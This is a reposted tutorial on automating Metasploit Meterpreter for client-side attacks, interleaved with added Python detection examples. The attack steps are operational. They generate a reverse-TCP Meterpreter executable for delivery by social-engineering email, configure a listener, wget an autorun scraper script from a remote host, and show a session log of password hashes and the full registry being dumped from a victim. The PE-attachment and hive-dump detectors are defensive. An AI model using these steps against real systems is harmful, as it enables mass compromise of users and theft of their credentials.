Metasploit 3 - Automating Meterpreter for Client-Side Exploits
Published: 2019-05-10


Step 1. Determine your payload delivery. In this case, we will be manually sending an email message to each target, with an executable attached. The actual "exploit" is social engineering, but this can be replaced by any other type of remote code execution vector. To generate an executable for the test, we use msfpayload piped to msfencode.

$ msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
    msfencode -b '\x00' -t exe -o meterpreter.exe
$ file meterpreter.exe
meterpreter.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit
$ ls -alrt meterpreter.exe
-rw-r--r-- 1 hdm hdm 9728 Nov 17 13:24 meterpreter.exe
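A defender-side counterpart to the delivery step, added here as an example (not code from the original post or from Metasploit): a mail-gateway check that identifies an attachment as a Windows executable from its bytes, the MZ and PE headers that `file` reported above, rather than from its file name or extension. The sample messages and the minimal PE-shaped stub are constructed for the demonstration.

```python
"""Flag e-mail attachments whose content is a Windows PE image.

Added example for this page (not HD Moore's code, not part of Metasploit).
A renamed executable keeps its MZ/PE headers, so the check reads the bytes
instead of trusting the file name. Sample messages below are constructed.
"""
import struct
from email import message_from_bytes, policy
from email.message import EmailMessage


def is_pe(data: bytes) -> bool:
    """True when data starts with 'MZ' and e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def executable_attachments(raw_message: bytes) -> list:
    """Return the declared file names of every non-multipart part that is a PE image."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        payload = part.get_payload(decode=True)  # undoes base64/quoted-printable
        if payload and is_pe(payload):
            hits.append(part.get_filename() or "<unnamed>")
    return hits


def build_pe_stub() -> bytes:
    """Constructed blob with only the headers the check looks at; it is not a runnable program."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)


def build_sample_message(attachment_name: str, content: bytes) -> bytes:
    """Constructed message with one attachment, as a gateway would receive it."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Quarterly report"
    msg.set_content("Please see the attached file.")
    msg.add_attachment(content, maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg.as_bytes()


if __name__ == "__main__":
    # An executable disguised with a document extension is still caught.
    print(executable_attachments(build_sample_message("report.pdf", build_pe_stub())))
    print(executable_attachments(build_sample_message("notes.txt", b"hello world")))
```

The check deliberately ignores the declared content type and file name: both are attacker-controlled, while the PE signature has to be present for Windows to run the file.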

Step 2. Configure a shellcode handler inside Metasploit 3. Since we are targeting a wide variety of users, we want them to connect back to us. In order to get the most amount of information possible, we will be using the Meterpreter payload.

msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST A.B.C.D
msf exploit(handler) > set LPORT 8080

Step 3. In order to make efficient use of each session, we are going to provide Meterpreter with an "autorun" script. This script will scrape system information from each session automatically when the session is created. One example of this kind of script can be found at:

msf exploit(handler) > sh -c 'cd /tmp; wget http://metasploit.com/users/hdm/tools/scraper.rb'
msf exploit(handler) > set AutoRunScript /tmp/scraper.rb
msf exploit(handler) > exploit -j

Step 4. Send out our email or otherwise force the Meterpreter payload to execute on each target. At this point, results should start streaming in. Once the autorun script completes, the session will be available from the msfconsole. The captured data will be stored in the ~/.msf3/logs/scraper/ directory.

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] New session on 10.10.11.164:12188...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:/DOCUME~1/HD/LOCALS~1/Temp/NIgfrwlC.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:/DOCUME~1/HD/LOCALS~1/Temp/dClzheFr.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:/DOCUME~1/HD/LOCALS~1/Temp/mhJZFMly.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:/DOCUME~1/HD/LOCALS~1/Temp/CphWxqAm.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:/DOCUME~1/HD/LOCALS~1/Temp/aHrkdFru.reg)
[*]  Cleaning HKU
[*] Completed processing on 10.10.11.164:12188...
[*] Meterpreter session 1 opened (10.10.10.26:8080 -> 10.10.11.164:12188)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: HDM-WIN/HD
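The session log shows the autorun script exporting each root hive to a randomly named .reg file in the user's Temp directory, pulling it back, then deleting it. What follows is an added example, not part of the original post or of scraper.rb, of detection logic for that export-then-delete sequence run over endpoint telemetry. It assumes (an assumption, not something the page states) that the export is performed with reg.exe and that process-creation and file-deletion events arrive as JSON lines; every event below is constructed.

```python
"""Detect whole-hive registry exports that are deleted again moments later.

Added example for this page; not part of the original post or of scraper.rb.
Assumptions (not stated on the page): the export runs through reg.exe, and the
endpoint ships process-creation and file-deletion events as JSON lines.
All sample events are constructed.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

ROOT_HIVES = {"HKCU", "HKLM", "HKCC", "HKCR", "HKU"}
# "reg export <hive> <file>"; the log above dumps whole root hives, not subkeys.
REG_EXPORT = re.compile(r"\breg(?:\.exe)?\s+export\s+(HK\w+)\s+(\S+)", re.IGNORECASE)


def parse_events(lines):
    """Turn JSON-lines telemetry into dicts with real timestamps, oldest first."""
    events = []
    for line in lines:
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def find_hive_dumps(events, window=timedelta(minutes=5), min_hives=3):
    """One alert per host on which at least min_hives root hives were exported
    to files that were deleted within `window` (export, download, clean up)."""
    deletes = {(e["host"], e["path"].lower()): e["ts"]
               for e in events if e["type"] == "file_delete"}
    per_host = defaultdict(list)
    for e in events:
        if e["type"] != "process_create":
            continue
        m = REG_EXPORT.search(e["cmdline"])
        if not m or m.group(1).upper() not in ROOT_HIVES:
            continue
        hive, path = m.group(1).upper(), m.group(2).lower()
        deleted_at = deletes.get((e["host"], path))
        if deleted_at is not None and timedelta(0) <= deleted_at - e["ts"] <= window:
            per_host[e["host"]].append((hive, path))
    alerts = []
    for host, hits in sorted(per_host.items()):
        hives = sorted({h for h, _ in hits})
        if len(hives) >= min_hives:
            alerts.append({"host": host, "hives": hives, "files": [p for _, p in hits]})
    return alerts


def _ev(host, ts, **fields):
    """Build one constructed telemetry line."""
    return json.dumps({"host": host, "ts": ts, **fields})


# Same directory layout as the log above; the .reg file names are constructed.
TEMP = "C:/DOCUME~1/HD/LOCALS~1/Temp/"
SAMPLE_LINES = []
for i, hive in enumerate(["HKCU", "HKLM", "HKCC", "HKCR", "HKU"]):
    path = f"{TEMP}cnst{i:04d}.reg"
    SAMPLE_LINES.append(_ev("ws01", f"2019-05-10T13:24:{2 * i:02d}", type="process_create",
                            image="C:/WINDOWS/system32/reg.exe",
                            cmdline=f"reg.exe export {hive} {path}"))
    SAMPLE_LINES.append(_ev("ws01", f"2019-05-10T13:24:{2 * i + 1:02d}",
                            type="file_delete", path=path))
# Benign: an administrator backs up one hive to a share and leaves the file in place.
SAMPLE_LINES.append(_ev("ws02", "2019-05-10T13:30:00", type="process_create",
                        image="C:/WINDOWS/system32/reg.exe",
                        cmdline="reg.exe export HKLM //backup/ws02/hklm.reg"))

if __name__ == "__main__":
    for alert in find_hive_dumps(parse_events(SAMPLE_LINES)):
        print(alert)
```

Requiring several root hives plus the short-lived file keeps the rule from firing on routine single-hive backups, while still catching the full sweep the script performs in one session.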

Reposted from: http://zuqmb.baihongyu.com/
